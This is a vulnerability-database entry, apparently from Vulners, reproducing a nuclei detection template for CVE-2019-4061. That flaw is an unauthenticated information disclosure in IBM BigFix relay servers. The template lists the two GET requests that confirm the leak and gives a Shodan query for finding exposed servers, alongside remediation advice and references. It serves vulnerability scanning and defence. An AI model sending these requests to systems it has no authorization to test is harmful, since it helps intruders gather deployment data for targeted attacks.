Lucene search
+L

IBM BigFix Platform - Information Disclosure

🗓️ 14 Aug 2026 03:38:04Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

IBM BigFix Platform exposes update and fixlet data via unauthenticated relay, enabling remote disclosure.

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2019-4061
20 Mar 201912:24
circl
cnvd
CNVD
IBM BigFix Platform Unauthorized Access Vulnerability
25 Feb 201900:00
cnvd
cve
CVE
CVE-2019-4061
27 Feb 201922:00
cve
cvelist
Cvelist
CVE-2019-4061
27 Feb 201922:00
cvelist
nessus
Tenable Nessus
IBM BigFix Platform 9.2.x <= 9.2.16 / 9.5.x <= 9.5.11 Information Disclosure
3 May 201900:00
nessus
metasploit
Metasploit
IBM BigFix Relay Server Sites and Package Enum
18 Mar 201900:00
metasploit
nvd
NVD
CVE-2019-4061
27 Feb 201922:29
nvd
osv
OSV
CVE-2019-4061
27 Feb 201922:29
osv
packetstorm
Packet Storm
IBM BigFix Relay Server Sites and Package Enum
31 Aug 202400:00
packetstorm
packetstorm
Packet Storm
📄 IBM BigFix Platform 9.2 Information Disclosure
17 Dec 202500:00
packetstorm
Rows per page
id: CVE-2019-4061

info:
  name: IBM BigFix Platform - Information Disclosure
  author: daffainfo
  severity: medium
  description: |
    IBM BigFix Platform 9.2 and 9.5 contains an information disclosure vulnerability caused by not enabling authenticated access in relay, letting remote attackers query and gather update and fixlet information, exploit requires no authentication.
  impact: |
    Attackers can remotely gather sensitive update and fixlet deployment information, potentially aiding targeted attacks.
  remediation: |
    Enable authenticated access for relay to prevent unauthorized information queries.
  reference:
    - https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers
    - https://github.com/rapid7/metasploit-framework/blob/0fd8f0984e10a135c000d1fb8797d76d62fb24f7/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2019-4061
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-4061
    epss-score: 0.22547
    epss-percentile: 0.975
    cwe-id: CWE-200
    cpe: cpe:2.3:a:ibm:bigfix_platform:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ibm
    product: bigfix_platform
    shodan-query: port:52311 "BigFixHTTPServer"
  tags: cve,cve2019,ibm,bigfix,disclosure,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/masthead/masthead.axfm"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Organization: ", "-URL: ")'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "x-bes-command-hasiteversion:")'
        condition: and
# digest: 4b0a00483046022100cd698e3871eefb33545671d6e37dbb44cab3c35e4006680d5036ffd8251e0471022100bfd355ec4d9d7a2040083402d0b60568ce02e8ab3dddc9fdd78ca0e094589008:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 25
CVSS 3.15.3
CVSS 35.3
EPSS0.22547
19